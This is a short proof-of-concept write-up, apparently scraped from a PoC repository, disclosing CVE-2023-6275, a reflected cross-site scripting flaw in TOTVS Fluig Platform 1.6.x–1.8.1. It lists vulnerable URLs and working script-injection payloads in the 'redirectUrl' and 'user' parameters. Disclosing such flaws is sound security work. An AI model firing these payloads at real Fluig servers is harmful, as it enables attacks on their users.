Nov 24, 2023 — A vulnerability was found in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1. It has been rated as problematic. # FLUIG-Vulnerabilidade-CVE-2023-6275
Nov 24, 2023 — A vulnerability was found in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1. It has been rated as problematic.
https://nvd.nist.gov/vuln/detail/CVE-2023-6275
CVE-2023-6275 - Reflected Cross-Site Scripting in TOTVS Fluig Plataform 1.6.X - 1.8.1
The TOTVS Fluig platform, in its versions from 1.6.1.X to 1.8.1, is vulnerable to Cross-Site Scripting in the 'redirectUrl' and 'user' parameters within the 'mobileredir' module.
Fluig is the productivity and collaboration platform that integrates with the ERP system, developed by Brazil's largest technology company, TOTVS, and hosted on the client's server.
Versions affecteds:
-- Fluig 1.6.X - Fluig 1.8.1 …
Attack Vector
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl=PAYLOAD
https://fluig.host.com/mobileredir/openApp.jsp?user=PAYLOAD
Payloads:
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script> https://fluig.host.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
ver também: https://vuldb.com/?id.246104 critério: manipulação de argumento ><script>alert(document.domain)</script>
The weakness was shared 11/24/2023. This vulnerability is handled as CVE-2023-6275. Successful exploitation requires user interaction by the victim. Technical details as well as a public exploit are known. The MITRE ATT&CK project declares the attack technique as T1059.007.
[4.0K] /data/pocs/cc0b1276a126eee46bc4ed7f5e25c0ae217aeeb3
└── [1.4K] README.md
0 directories, 1 file